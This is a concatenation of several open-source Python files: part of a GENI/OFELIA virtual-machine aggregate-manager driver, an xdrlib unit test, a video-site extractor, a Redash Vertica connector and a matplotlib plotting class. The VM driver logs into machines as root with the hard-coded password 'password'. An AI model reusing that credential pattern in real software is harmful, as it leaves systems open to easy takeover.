VTAMDriver.logger.warn("BUSY sliver in state '%s'" % self.GENI_UPDATING_USERS)
raise Exception("BUSY sliver in state '%s'" % self.GENI_UPDATING_USERS)
vm_params = {"server_uuid":server.uuid, "vm_id":vm.id}
if vm_params not in vm_server_pairs:
vm_server_pairs.append(vm_params)
try:
with self.__mutex_thread:
VTDriver.PropagateActionToProvisioningDispatcher(vm.id, server.uuid, action)
except Exception as e:
VTAMDriver.logger.exception("")
try:
if self.get_geni_best_effort_mode():
resource = self.__convert_to_resources_with_slivers(server, [vm])[0]
resource.set_error_message(str(e))
#resources.extend(resource)
resources.append(resource)
continue
else:
raise e
except Exception as e:
VTAMDriver.logger.exception("")
raise e
# The resources are fetched for any (allocated/provisioned) VM
resource = self.__convert_to_resources_with_slivers(server, [vm])
resources.extend(resource)
return resources
def __get_best_server(self):
nvms = dict()
servers = VTServer.objects.all()
for server in servers:
vms = server.getChildObject().getVMs()
nvms[len(vms)] = server.name
candidate = min(nvms.keys())
return nvms[candidate]
def __urn_to_vm_params(self, urn):
#XXX For now, I prefer to have the same slice name as project name
hrn, hrn_type = urn_to_hrn(urn)
if hrn_type == "sliver":
value = hrn.split(".")[-1]
try:
# XXX Why the int() conversion in the "sliver_part"
return {"id":int(value)}
except:
# E.g. VMs from jFed
slice_name = hrn.split(".")[-2]
# Partial matching (RegEx...)
return {"name":value, "sliceName__iregex":slice_name}
elif hrn_type == "slice":
return {"projectName":hrn, "sliceName":hrn}
else:
return None
def __convert_to_resource(self, server):
#TODO add missing params
component_manager_id = self.__generate_component_manager_id(server)
component_manager_name = self.__generate_component_manager_id(server)
component_id = self.__generate_component_id(server)
component_name = self.__generate_component_id(server)
resource = Resource()
resource.set_component_manager_id(component_manager_id)
resource.set_component_id(component_id)
resource.set_component_manager_name(component_manager_name)
resource.set_component_name(component_name)
# Default params
resource.set_available(server.available)
resource.set_exclusive(False)
return resource
def __convert_to_links(self, server):
links = list()
network_ifaces = server.networkInterfaces.all()
for network_interface in network_ifaces:
link = Link()
if not network_interface.switchID:
continue
#network_interface.switchID = "OfeliaVPNGateWay"
dpid_port = "%s_%s" % (network_interface.switchID, network_interface.port)
component_id = self.__get_link_urn(network_interface.name, dpid_port, server.name)
VTAMDriver.logger.debug("XXX name = " + network_interface.name + ", dpid_port = " + dpid_port)
#VTAMDriver.logger.debug("XXX component_id = " + component_id)
link.set_component_id(component_id)
link.set_component_name(component_id)
link.set_capacity("1024MB/s")
link.set_dest_id(self.__get_foreign_urn(network_interface.switchID))
link.set_source_id(self.__get_port_urn(network_interface.name, server.name))
#VTAMDriver.logger.debug("XXX source_id = " + link.get_source_id())
link.set_type("L2 Link")
links.append(link)
return links
def __get_link_urn(self, source, dst, server_name):
name = self.__correct_iface_name(source)
return hrn_to_urn(self.__config.CM_HRN + "." + str(server_name)+ "." + str(name) + "-" + str(dst),"link")
def __correct_iface_name(self, iface_name):
# Returns correct eth name from server
if "." not in iface_name:
#return iface_name.replace(iface_name[-1], str(int(iface_name[-1])-1))
return iface_name
else:
return self.__correct_iface_name(iface_name.split(".")[0])
def __get_foreign_urn(self, dpid):
return hrn_to_urn(self.__config.FOREIGN_HRN + "." + str(dpid),"datapath")
def __get_port_urn(self, port, server_name):
name = self.__correct_iface_name(port)
# return hrn_to_urn(self.__config.CM_HRN + "." + str(server_name) + "." + str(name),"interface")
return hrn_to_urn(self.__config.CM_HRN + "." + str(server_name), "node") + "+interface+" + str(name)
def __convert_to_resources_with_slivers(self, server, vms, expiration=None):
"""
Always return a list of slivers, independently of the number of resources inside.
"""
resource = self.__convert_to_resource(server)
resources = list()
for vm in vms:
if not expiration:
try:
expiration = ExpiringComponents.objects.filter(slice=vm.sliceName, authority=vm.projectName)[0].expires
except Exception as e:
print e
if not expiration:
VTAMDriver.logger.debug("cannot find expiration in ExpiringComponents, use vm.valid_until")
expiration = vm.valid_until
if not expiration:
VTAMDriver.logger.debug("cannot find expiration in vm class, use default")
expiration = datetime.today()
VTAMDriver.logger.debug("expiration = " + str(expiration))
new_resource = copy.deepcopy(resource)
new_resource.set_id(vm.name)
VTAMDriver.logger.debug("vm.name = " + new_resource.get_id())
sliver = Sliver()
sliver.set_type("VM")
sliver.set_expiration(expiration)
sliver.set_client_id(vm.name)
sliver.set_urn(self.__generate_sliver_urn(vm, server.name + "." + vm.sliceName.split(".")[-1]))
sliver.set_slice_urn(hrn_to_urn(vm.sliceName, "slice"))
if isinstance(vm, VirtualMachine):
sliver.set_services(self.__generate_vt_am_services(vm))
sliver.set_allocation_status(self.__translate_to_allocation_state(vm))
sliver.set_operational_status(self.__translate_to_operational_state(vm))
sliver.set_expiration(expiration)
new_resource.set_sliver(sliver)
resources.append(copy.deepcopy(new_resource))
return resources
# Sliver Utils Stuff
def __generate_vt_am_services(self, vm):
vm_ip = self.__get_ip_from_vm(vm)
#login_services = [{"login":{"authentication":"ssh", "hostname":vm_ip, "port": "22", "username":"root:openflow"}}]
keys = VirtualMachineKeys.objects.filter(vm_uuid=vm.uuid)
login_services = []
used_user_names = []
for key in keys:
if not key.user_name in used_user_names:
#login_services.append({"login":{"authentication":"ssh-keys", "hostname":vm_ip, "port": "22", "username":key.user_name}})
login_services.append({"login":{"authentication":"ssh", "hostname":vm_ip, "port": "22", "username":"root"}})
used_user_names.append(key.user_name)
return login_services
# URN Stuff
def __generate_component_manager_id(self, server):
return hrn_to_urn(self.__config.CM_HRN, "authority+cm")
def __generate_component_manager_name(self, server):
return hrn_to_urn(self.__config.CM_HRN, "authority+cm")
def __generate_component_id(self, server):
return hrn_to_urn(self.__config.CM_HRN+"."+str(server.name),"node")
def generate_component_id(self, server):
return hrn_to_urn(self.__config.CM_HRN+"."+str(server.name),"node")
def __generate_component_name(self, server):
return hrn_to_urn(self.__config.CM_HRN+"."+str(server.name),"node")
def __generate_sliver_urn(self, vm, slice_leaf=None):
if slice_leaf:
return hrn_to_urn(self.__config.CM_HRN + "." + slice_leaf + "." + str(vm.name), "sliver")
else:
return hrn_to_urn(self.__config.CM_HRN + "." + str(vm.name), "sliver")
def generate_sliver_urn(self, vm, slice_leaf=None):
if slice_leaf:
return hrn_to_urn(self.__config.CM_HRN + "." + slice_leaf + "." + str(vm.name), "sliver")
else:
return hrn_to_urn(self.__config.CM_HRN + "." + str(vm.name), "sliver")
def __select_sliver_expiration(self, user_expiration, slice_expiration=None, **kwargs):
if not slice_expiration:
current_time = datetime.utcnow()
if "extension_timedelta" in kwargs:
extension_timedelta = kwargs["extension_timedelta"]
else:
extension_timedelta = {"days": 31} # Default set to one month
slice_expiration = current_time + timedelta(**extension_timedelta)
slice_expiration = slice_expiration.replace(tzinfo=dateutil.tz.tzutc()).strftime("%Y-%m-%d %H:%M:%S")
slice_expiration = slice_expiration.replace(" ", "T")+"Z"
# Retrieve expiration = minimum ( user expiration, slice expiration )
extended_expiration = min(user_expiration, slice_expiration)
return extended_expiration
# VT AM Models Utils
def __get_ip_from_vm(self, vm):
ifaces = vm.getNetworkInterfaces()
for iface in ifaces:
if iface.isMgmt:
return iface.ip4s.all()[0].ip #IP
return "None"
def get_action_instance(self, reservation):
rspec = XmlHelper.getSimpleActionQuery()
actionClass = copy.deepcopy(rspec.query.provisioning.action[0])
actionClass.type_ = "create"
rspec.query.provisioning.action.pop()
#server = reservation.server()
server = reservation.server
vm = self.get_default_vm_parameters(reservation)
actionClass.id = uuid.uuid4()
self.vm_dict_to_class(vm, actionClass.server.virtual_machines[0])
self.vm_dict_ifaces_to_class(vm["interfaces"],actionClass.server.virtual_machines[0].xen_configuration.interfaces)
actionClass.server.uuid = server.uuid
actionClass.server.virtualization_type = server.getVirtTech()
rspec.query.provisioning.action.append(actionClass)
return rspec.query.provisioning
def get_default_vm_parameters_old(self, reservation):
VTAMDriver.logger.debug("get_default_vm_parameters() called")
vm = dict()
### TODO: Consider used the same name as id for project and slices
vm["project-id"] = str(uuid.uuid4())
vm["slice-id"] = str(uuid.uuid4())
vm["project-name"] = reservation.get_project_name()
vm["slice-name"]= reservation.get_slice_name()
vm["uuid"] = reservation.uuid
vm["virtualization-type"] = reservation.server.getVirtTech()
vm["server-id"] = reservation.server.getUUID()
vm["name"] = reservation.get_name()
vm["state"] = "on queue"
vm["aggregate-id"] = "aggregate-id"
vm["operating-system-type"] = "GNU/Linux"
vm["operating-system-version"] = "6.0"
vm["operating-system-distribution"] = "Debian"
vm["hd-origin-path"] = "legacy/legacy.tar.gz"
vm["interfaces"] = list()
vm["hd-setup-type"] = "file-image"
vm["virtualization-setup-type"] = "paravirtualization"
vm["memory-mb"] = 512
return vm
# AIST 201508
def get_default_vm_parameters(self, reservation):
VTAMDriver.logger.debug("get_default_vm_parameters() called")
vm = dict()
### TODO: Consider used the same name as id for project and slices
vm["project-id"] = str(uuid.uuid4())
vm["slice-id"] = str(uuid.uuid4())
vm["project-name"] = reservation.get_project_name()
vm["slice-name"]= reservation.get_slice_name()
vm["uuid"] = reservation.uuid
vm["virtualization-type"] = reservation.server.getVirtTech()
vm["server-id"] = reservation.server.getUUID()
vm["name"] = reservation.get_name()
vm["state"] = "on queue"
vm["aggregate-id"] = "aggregate-id"
vm["operating-system-type"] = "GNU/Linux"
vm["operating-system-version"] = "6.0"
vm["operating-system-distribution"] = "Debian"
vm["hd-origin-path"] = reservation.get_disk_image()
vm["interfaces"] = list()
vm["hd-setup-type"] = "file-image"
vm["virtualization-setup-type"] = "paravirtualization"
vm["memory-mb"] = 4096
return vm
def vm_dict_to_class(self, vm_dict, vm_class):
vm_class.name = vm_dict["name"]
vm_class.uuid = vm_dict["uuid"]
vm_class.status = vm_dict["state"]
vm_class.project_id = vm_dict["project-id"]
vm_class.project_name = vm_dict["project-name"]
vm_class.slice_id = vm_dict["slice-id"]
vm_class.slice_name = vm_dict["slice-name"]
vm_class.operating_system_type = vm_dict["operating-system-type"]
vm_class.operating_system_version = vm_dict["operating-system-version"]
vm_class.operating_system_distribution = vm_dict["operating-system-distribution"]
vm_class.virtualization_type = vm_dict["virtualization-type"]
vm_class.server_id = vm_dict["server-id"]
vm_class.xen_configuration.hd_setup_type = vm_dict["hd-setup-type"]
vm_class.xen_configuration.hd_origin_path = vm_dict["hd-origin-path"]
vm_class.xen_configuration.virtualization_setup_type = vm_dict["virtualization-setup-type"]
vm_class.xen_configuration.memory_mb = int(vm_dict["memory-mb"])
def vm_dict_ifaces_to_class(self, iface_list, iface_class):
iface_class_empty = copy.deepcopy(iface_class.interface[0])
if not iface_list:
iface_list = []
iface = dict()
iface["gw"] = None
iface["mac"] = None
iface["name"] = None
iface["dns1"] = None
iface["dns2"] = None
iface["ip"] = None
iface["mask"] = None
iface_list.append(iface)
for iface in iface_list:
iface_class_empty = copy.deepcopy(iface_class.interface[0])
iface_class_empty.gw = iface["gw"]
iface_class_empty.mac = iface["mac"]
iface_class_empty.name = iface["name"]
iface_class_empty.dns1 = iface["dns1"]
iface_class_empty.dns2 = iface["dns2"]
iface_class_empty.ip = iface["ip"]
iface_class_empty.mask = iface["mask"]
if "ismgmt" in iface.keys():
iface_class_empty.ismgmt = iface["ismgmt"]
else:
iface_class_empty.ismgmt = "false"
iface_class.interface.append(iface_class_empty)
iface_class.interface.pop(0) # Deleting the empty interface instance
def __translate_to_allocation_state(self, vm):
if isinstance(vm, Reservation):
return self.GENI_ALLOCATED
else:
return self.GENI_PROVISIONED
def __translate_to_operational_state(self, vm):
# TODO Extend
"""
Defines mapping between OFELIA and GENI states
"""
if isinstance(vm, Reservation):
return self.GENI_NOT_READY
else:
if "running" in vm.state:
return self.GENI_READY
elif "contextualizing..." in vm.state:
return self.GENI_UPDATING_USERS
elif "ing..." in vm.state:
return self.GENI_CONFIGURING
elif "failed" in vm.state:
return self.GENI_FAILED
else:
return self.GENI_NOT_READY
def __add_expiration(self, expiration, project_name, slice_name):
expiring_slivers = ExpiringComponents.objects.filter(slice=slice_name)
if expiring_slivers:
expiring_sliver = expiring_slivers[0]
expiring_sliver.expires = expiration
else:
expiring_sliver = ExpiringComponents(authority=project_name, slice=slice_name, expires=expiration)
expiring_sliver.save()
def retrieve_access_data(self, urns, geni_best_effort=False):
accesses_data = []
for urn in urns:
vm_params = self.__urn_to_vm_params(urn)
vms = VirtualMachine.objects.filter(**vm_params)
for vm in vms:
vm_data = dict()
vm_data["host"] = dict()
access_data = self.__generate_vt_am_services(vm)
vm_data["host"]["name"] = vm.name
vm_data["login"] = []
for access in access_data:
# Regroup and filter data to avoid replication
access = access["login"]
vm_data["host"]["ip"] = access["hostname"]
access.pop("hostname", None)
vm_data["login"].append(access)
accesses_data.append(vm_data)
return accesses_data
def update_keys(self, urns, geni_users, geni_best_effort=False):
"""
geni_update_users: The credentials[] argument must include credentials over the slice as usual. The options struct must include the geni_users option as specified in AM API v3 and with the semantics described above. This action is only legal on slivers in the geni_ready operational state. This action immediately moves all such slivers to a new geni_updating_users operational state. Slivers stays in that state until the aggregate completes the needed changes, at which time the slivers change back to the geni_ready operational state. Slivers may be in the geni_updating_users state for several minutes; during this time no other operational actions can be taken on the slivers.
"""
self.set_geni_best_effort_mode(geni_best_effort)
vms = list()
resources = list()
for urn in urns:
params = self.__urn_to_vm_params(urn)
servers = VTServer.objects.all()
resources = list()
for server in servers:
vms.extend(server.getChildObject().getVMs(**params))
# Check preconditions (VMs must be in allowed state prior to update the keys)
# If not on "best effort" mode, honor or revoke all requests
if not self.get_geni_best_effort_mode():
for vm in vms:
# Return "REFUSED" exception if sliver is in a transient state
self.__validate_precondition_states(vm, "PerformOperationalAction")
# Only acts on slivers with state "geni_ready"
if self.__translate_to_operational_state(vm) != self.GENI_READY:
raise Exception("REFUSED to perform OperationalAction on sliver not ready (maybe stopped or configuring)")
# Store user's SSH keys
self.__store_user_keys(geni_users, vms)
for vm in set(vms):
try:
# Return "REFUSED" exception if sliver is in a transient state
self.__validate_precondition_states(vm, "PerformOperationalAction")
# Only acts on slivers with state "geni_ready"
if self.__translate_to_operational_state(vm) != self.GENI_READY:
raise Exception("REFUSED to perform OperationalAction on sliver not ready (maybe stopped or configuring)")
else:
# Contextualize independently of the SSH keys stored this time
# Note that user might lose access to VM at some point after creation
ip = self.__get_ip_from_vm(vm)
vm_dict = self.__vm_to_ssh_keys_params_list(vm, geni_users)
# If no error was found, change operational status to "geni_updating_users"
try:
# NOTE that this is somewhat insecure
vm.state = "contextualizing..." # New state for states similar to self.GENI_UPDATING_USERS
vm.save()
except:
pass
self.__contextualize_vm(vm, ip)
# Create resources with proper format
servers = VTServer.objects.all()
for server in servers:
# The server for the VM has been just found
vms = server.getChildObject().getVMs(**params)
if vms:
# Create resources with proper format
resource = self.__convert_to_resources_with_slivers(server, [vm])
resources.extend(resource)
except Exception as e:
try:
if self.get_geni_best_effort_mode():
# Create resources with proper format
resource = self.__convert_to_resources_with_slivers(server, [vm])[0]
resource.set_error_message(str(e))
resources.append(resource)
continue
else:
raise e
except Exception as e:
raise e
# If no error was found, change operational status back to "geni_ready"
# (after information of slivers is sent to client)
try:
# NOTE that this is somewhat insecure
vm.state = "running" # New state for states similar to self.GENI_READY
vm.save()
except:
pass
return resources
def cancel_update_keys(self, urns, geni_best_effort=False):
self.set_geni_best_effort_mode(geni_best_effort)
vms = list()
resources = list()
servers = VTServer.objects.all()
if not self.get_geni_best_effort_mode():
for urn in urns:
params = self.__urn_to_vm_params(urn)
for server in servers:
vms = server.getChildObject().getVMs(**params)
# Check preconditions (VMs must be in allowed state prior to update the keys)
# If not on "best effort" mode, honor or revoke all requests
for vm in vms:
# NOTE that this method acts on transient states, as it is its aim to revert some of them
# Only acts on slivers with state "geni_updating_users"
if self.__translate_to_operational_state(vm) != self.GENI_UPDATING_USERS:
raise Exception("REFUSED to perform OperationalAction on sliver that had not updated users")
for urn in urns:
params = self.__urn_to_vm_params(urn)
resources = list()
for server in servers:
# The server for the VM has been just found
vms = server.getChildObject().getVMs(**params)
for vm in vms:
try:
# Only acts on slivers with state "geni_updating_users"
if self.__translate_to_operational_state(vm) != self.GENI_UPDATING_USERS:
raise Exception("REFUSED to perform OperationalAction on sliver that had not updated users")
else:
# If no error was found, change operational status to "geni_ready"
try:
# NOTE that this is somewhat insecure
vm.state = "running" # State equivalent to self.GENI_READY
vm.save()
except:
pass
except Exception as e:
try:
if self.get_geni_best_effort_mode():
# Create resources with proper format
resource = self.__convert_to_resources_with_slivers(server, [vm])[0]
resource.set_error_message(str(e))
resources.append(resource)
continue
else:
raise e
except Exception as e:
raise e
# Create resources with proper format
resource = self.__convert_to_resources_with_slivers(server, [vm])
resources.extend(resource)
return resources
def __contextualize_vm(self, vm, ip):
# SSH keys for users are passed to the VM right after it is started
vm_keys = VirtualMachineKeys.objects.filter(slice_uuid=vm.sliceId, project_uuid=vm.projectId)
params = {
"vm_address": str(ip) ,
"vm_user": "root",
"vm_password": "password",
}
vm_context = VMContextualize(**params)
try:
user_keys = {}
for vm_key in vm_keys:
user_name = str(vm_key.get_user_name())
if user_name not in user_keys:
user_keys[user_name] = [ vm_key.get_ssh_key() ]
else:
user_keys[user_name].append(vm_key.get_ssh_key())
logging.debug("Adding %s's public key(s) into VM. Key contents: %s" % (vm_key.get_user_name(), user_keys[str(vm_key.get_user_name())]))
# Placing a number of keys per user, multiple users
if len(user_keys) > 0:
with self.__mutex_process:
# FIXME Sometimes do not work properly and keys are not getting to the VM
ServiceProcess.startMethodInNewProcess(vm_context.contextualize_add_pub_keys,
[user_keys], self.__agent_callback_url)
except Exception as e:
raise e
def __vm_to_ssh_keys_params_list(self, vm, users=[]):
params_list = list()
params = {"project_uuid": vm.projectId,
"slice_uuid": vm.sliceId,
"vm_uuid": vm.uuid,
}
if not users:
params_list.append(params)
for user in users:
# Reuse "params" structure by operating on a new structure
params_user = copy.deepcopy(params)
# Retrieve user string from URN
user_id_key = "urn"
if user_id_key not in user:
# Get the other key that's not the user's keys
# Depending on client: "urn", "name", ...
user_id_key = set(user.keys()) - set(["keys"])
user_id_key = user_id_key.pop()
try:
user_name = urn_to_hrn(user[user_id_key])[0].split(".")[-1]
except:
user_name = user[user_id_key]
params_user.update({"user_name": user_name,})
for key in user["keys"]:
params_user_keys = copy.deepcopy(params_user)
params_user_keys.update({"ssh_key": key,})
params_list.append(params_user_keys)
return params_list
def __store_user_keys(self, users, vms):
stored_keys = False
try:
# Wrap users into list, if not already
if not isinstance(users, list):
users = [users]
for vm in vms:
params_list = self.__vm_to_ssh_keys_params_list(vm, users)
# Create N entries, each for a specific key
for params in params_list:
# If SSH key is not yet stored
if not VirtualMachineKeys.objects.filter(**params):
key_entry = VirtualMachineKeys(**params)
key_entry.save()
stored_keys = True
except Exception as e:
logging.error("Could not store user SSH key. Details: %s" % str(e))
return stored_keys
def get_config(self):
return self.__config
def set_config(self, value):
self.__config = value | unknown | codeparrot/codeparrot-clean | ||
import unittest
import xdrlib
class XDRTest(unittest.TestCase):
def test_xdr(self):
p = xdrlib.Packer()
s = b'hello world'
a = [b'what', b'is', b'hapnin', b'doctor']
p.pack_int(42)
p.pack_int(-17)
p.pack_uint(9)
p.pack_bool(True)
p.pack_bool(False)
p.pack_uhyper(45)
p.pack_float(1.9)
p.pack_double(1.9)
p.pack_string(s)
p.pack_list(range(5), p.pack_uint)
p.pack_array(a, p.pack_string)
# now verify
data = p.get_buffer()
up = xdrlib.Unpacker(data)
self.assertEqual(up.get_position(), 0)
self.assertEqual(up.unpack_int(), 42)
self.assertEqual(up.unpack_int(), -17)
self.assertEqual(up.unpack_uint(), 9)
self.assertTrue(up.unpack_bool() is True)
# remember position
pos = up.get_position()
self.assertTrue(up.unpack_bool() is False)
# rewind and unpack again
up.set_position(pos)
self.assertTrue(up.unpack_bool() is False)
self.assertEqual(up.unpack_uhyper(), 45)
self.assertAlmostEqual(up.unpack_float(), 1.9)
self.assertAlmostEqual(up.unpack_double(), 1.9)
self.assertEqual(up.unpack_string(), s)
self.assertEqual(up.unpack_list(up.unpack_uint), list(range(5)))
self.assertEqual(up.unpack_array(up.unpack_string), a)
up.done()
self.assertRaises(EOFError, up.unpack_uint)
class ConversionErrorTest(unittest.TestCase):
def setUp(self):
self.packer = xdrlib.Packer()
def assertRaisesConversion(self, *args):
self.assertRaises(xdrlib.ConversionError, *args)
def test_pack_int(self):
self.assertRaisesConversion(self.packer.pack_int, 'string')
def test_pack_uint(self):
self.assertRaisesConversion(self.packer.pack_uint, 'string')
def test_float(self):
self.assertRaisesConversion(self.packer.pack_float, 'string')
def test_double(self):
self.assertRaisesConversion(self.packer.pack_double, 'string')
def test_uhyper(self):
self.assertRaisesConversion(self.packer.pack_uhyper, 'string')
if __name__ == "__main__":
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..compat import (
compat_b64decode,
compat_urllib_parse_unquote,
)
class BigflixIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?bigflix\.com/.+/(?P<id>[0-9]+)'
_TESTS = [{
# 2 formats
'url': 'http://www.bigflix.com/Tamil-movies/Drama-movies/Madarasapatinam/16070',
'info_dict': {
'id': '16070',
'ext': 'mp4',
'title': 'Madarasapatinam',
'description': 'md5:9f0470b26a4ba8e824c823b5d95c2f6b',
'formats': 'mincount:2',
},
'params': {
'skip_download': True,
}
}, {
# multiple formats
'url': 'http://www.bigflix.com/Malayalam-movies/Drama-movies/Indian-Rupee/15967',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
title = self._html_search_regex(
r'<div[^>]+class=["\']pagetitle["\'][^>]*>(.+?)</div>',
webpage, 'title')
def decode_url(quoted_b64_url):
return compat_b64decode(compat_urllib_parse_unquote(
quoted_b64_url)).decode('utf-8')
formats = []
for height, encoded_url in re.findall(
r'ContentURL_(\d{3,4})[pP][^=]+=([^&]+)', webpage):
video_url = decode_url(encoded_url)
f = {
'url': video_url,
'format_id': '%sp' % height,
'height': int(height),
}
if video_url.startswith('rtmp'):
f['ext'] = 'flv'
formats.append(f)
file_url = self._search_regex(
r'file=([^&]+)', webpage, 'video url', default=None)
if file_url:
video_url = decode_url(file_url)
if all(f['url'] != video_url for f in formats):
formats.append({
'url': decode_url(file_url),
})
self._sort_formats(formats)
description = self._html_search_meta('description', webpage)
return {
'id': video_id,
'title': title,
'description': description,
'formats': formats
} | unknown | codeparrot/codeparrot-clean | ||
import sys
import json
import logging
from redash.utils import JSONEncoder
from redash.query_runner import *
logger = logging.getLogger(__name__)
types_map = {
5: TYPE_BOOLEAN,
6: TYPE_INTEGER,
7: TYPE_FLOAT,
8: TYPE_STRING,
9: TYPE_STRING,
10: TYPE_DATE,
11: TYPE_DATETIME,
12: TYPE_DATETIME,
13: TYPE_DATETIME,
14: TYPE_DATETIME,
15: TYPE_DATETIME,
16: TYPE_FLOAT,
17: TYPE_STRING,
114: TYPE_DATETIME,
115: TYPE_STRING,
116: TYPE_STRING,
117: TYPE_STRING
}
class Vertica(BaseSQLQueryRunner):
noop_query = "SELECT 1"
@classmethod
def configuration_schema(cls):
return {
'type': 'object',
'properties': {
'host': {
'type': 'string'
},
'user': {
'type': 'string'
},
'password': {
'type': 'string',
'title': 'Password'
},
'database': {
'type': 'string',
'title': 'Database name'
},
"port": {
"type": "number"
},
},
'required': ['database'],
'secret': ['password']
}
@classmethod
def enabled(cls):
try:
import vertica_python
except ImportError:
return False
return True
def __init__(self, configuration):
super(Vertica, self).__init__(configuration)
def _get_tables(self, schema):
query = """
Select table_schema, table_name, column_name from columns where is_system_table=false
union all
select table_schema, table_name, column_name from view_columns;
"""
results, error = self.run_query(query, None)
if error is not None:
raise Exception("Failed getting schema.")
results = json.loads(results)
for row in results['rows']:
table_name = '{}.{}'.format(row['table_schema'], row['table_name'])
if table_name not in schema:
schema[table_name] = {'name': table_name, 'columns': []}
schema[table_name]['columns'].append(row['column_name'])
return schema.values()
def run_query(self, query, user):
import vertica_python
if query == "":
json_data = None
error = "Query is empty"
return json_data, error
connection = None
try:
conn_info = {
'host': self.configuration.get('host', ''),
'port': self.configuration.get('port', 5433),
'user': self.configuration.get('user', ''),
'password': self.configuration.get('password', ''),
'database': self.configuration.get('database', '')
}
connection = vertica_python.connect(**conn_info)
cursor = connection.cursor()
logger.debug("Vetica running query: %s", query)
cursor.execute(query)
# TODO - very similar to pg.py
if cursor.description is not None:
columns_data = [(i[0], i[1]) for i in cursor.description]
rows = [dict(zip((c[0] for c in columns_data), row)) for row in cursor.fetchall()]
columns = [{'name': col[0],
'friendly_name': col[0],
'type': types_map.get(col[1], None)} for col in columns_data]
data = {'columns': columns, 'rows': rows}
json_data = json.dumps(data, cls=JSONEncoder)
error = None
else:
json_data = None
error = "No data was returned."
cursor.close()
except KeyboardInterrupt:
error = "Query cancelled by user."
json_data = None
except Exception as e:
raise sys.exc_info()[1], None, sys.exc_info()[2]
finally:
if connection:
connection.close()
return json_data, error
register(Vertica) | unknown | codeparrot/codeparrot-clean | ||
###############################################################################
#
# AbstractPlot.py - Abstract base class for plotting.
#
###############################################################################
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
import matplotlib.transforms as mtransforms
from matplotlib.patches import Rectangle
import matplotlib as mpl
import numpy as np
class AbstractPlot(FigureCanvas):
'''
Abstract base class for plotting.
'''
def __init__(self, options):
self.options = options
# Global plot settings
mpl.rcParams['font.size'] = self.options.font_size
mpl.rcParams['axes.titlesize'] = self.options.font_size
mpl.rcParams['axes.labelsize'] = self.options.font_size
mpl.rcParams['xtick.labelsize'] = self.options.font_size
mpl.rcParams['ytick.labelsize'] = self.options.font_size
mpl.rcParams['legend.fontsize'] = self.options.font_size
mpl.rcParams['svg.fonttype'] = 'none'
self.fig = Figure(facecolor='white', dpi=options.dpi)
FigureCanvas.__init__(self, self.fig)
self.cid = None
self.type = '<none>'
self.name = '<none>'
self.axesColour = (0.5, 0.5, 0.5)
def savePlot(self, filename, dpi=300):
imgFormat = filename[filename.rfind('.')+1:len(filename)]
if imgFormat in ['png', 'pdf', 'ps', 'eps','svg']:
self.fig.savefig(filename,format=imgFormat,dpi=dpi,facecolor='white',edgecolor='white')
else:
pass
def labelExtents(self, xLabels, xFontSize, xRotation, yLabels, yFontSize, yRotation):
self.fig.clear()
tempAxes = self.fig.add_axes([0,0,1.0,1.0])
tempAxes.set_xticks(np.arange(len(xLabels)))
tempAxes.set_yticks(np.arange(len(yLabels)))
xText = tempAxes.set_xticklabels(xLabels, size=xFontSize, rotation=xRotation)
yText = tempAxes.set_yticklabels(yLabels, size=yFontSize, rotation=yRotation)
bboxes = []
for label in xText:
bbox = label.get_window_extent(self.get_renderer())
bboxi = bbox.inverse_transformed(self.fig.transFigure)
bboxes.append(bboxi)
xLabelBounds = mtransforms.Bbox.union(bboxes)
bboxes = []
for label in yText:
bbox = label.get_window_extent(self.get_renderer())
bboxi = bbox.inverse_transformed(self.fig.transFigure)
bboxes.append(bboxi)
yLabelBounds = mtransforms.Bbox.union(bboxes)
self.fig.clear()
return xLabelBounds, yLabelBounds
def xLabelExtents(self, labels, fontSize, rotation=0):
self.fig.clear()
tempAxes = self.fig.add_axes([0,0,1.0,1.0])
tempAxes.set_xticks(np.arange(len(labels)))
xLabels = tempAxes.set_xticklabels(labels, size=fontSize, rotation=rotation)
bboxes = []
for label in xLabels:
bbox = label.get_window_extent(self.get_renderer())
bboxi = bbox.inverse_transformed(self.fig.transFigure)
bboxes.append(bboxi)
xLabelBounds = mtransforms.Bbox.union(bboxes)
self.fig.clear()
return xLabelBounds
def yLabelExtents(self, labels, fontSize, rotation=0):
self.fig.clear()
tempAxes = self.fig.add_axes([0,0,1.0,1.0])
tempAxes.set_yticks(np.arange(len(labels)))
yLabels = tempAxes.set_yticklabels(labels, size=fontSize, rotation=rotation)
bboxes = []
for label in yLabels:
bbox = label.get_window_extent(self.get_renderer())
bboxi = bbox.inverse_transformed(self.fig.transFigure)
bboxes.append(bboxi)
yLabelBounds = mtransforms.Bbox.union(bboxes)
self.fig.clear()
return yLabelBounds
def formatLabels(self, labels):
formattedLabels = []
for label in labels:
value = float(label.get_text())
if value < 0.01:
valueStr = '%.2e' % value
if 'e-00' in valueStr:
valueStr = valueStr.replace('e-00', 'e-')
elif 'e-0' in valueStr:
valueStr = valueStr.replace('e-0', 'e-')
else:
valueStr = '%.3f' % value
formattedLabels.append(valueStr)
return formattedLabels
def removeExtraZeros(self, label):
if '.' in label:
while label[-1] == '0':
label = label[0:-1]
if label[-1] == '.': # remove potential trailing decimal point
label = label[0:-1]
return label
def boundingBox(self, data, ax, label, bBoundingBoxes, bLabels):
''' Draw bounding box around data.'''
data = np.array(data)
width = max(data[:,0]) - min(data[:,0])
height = max(data[:,1]) - min(data[:,1])
r = Rectangle((min(data[:,0]), min(data[:,1])), width, height)
if bBoundingBoxes:
ax.add_artist(r)
r.set_clip_box(ax.bbox)
r.set_alpha(0.1)
r.set_facecolor((0.5, 0.5, 0.5))
if bLabels:
ax.annotate(label, xy = (min(data[:,0]), max(data[:,1])), xytext = (0, 0),
textcoords = 'offset points', ha = 'right', va = 'bottom',
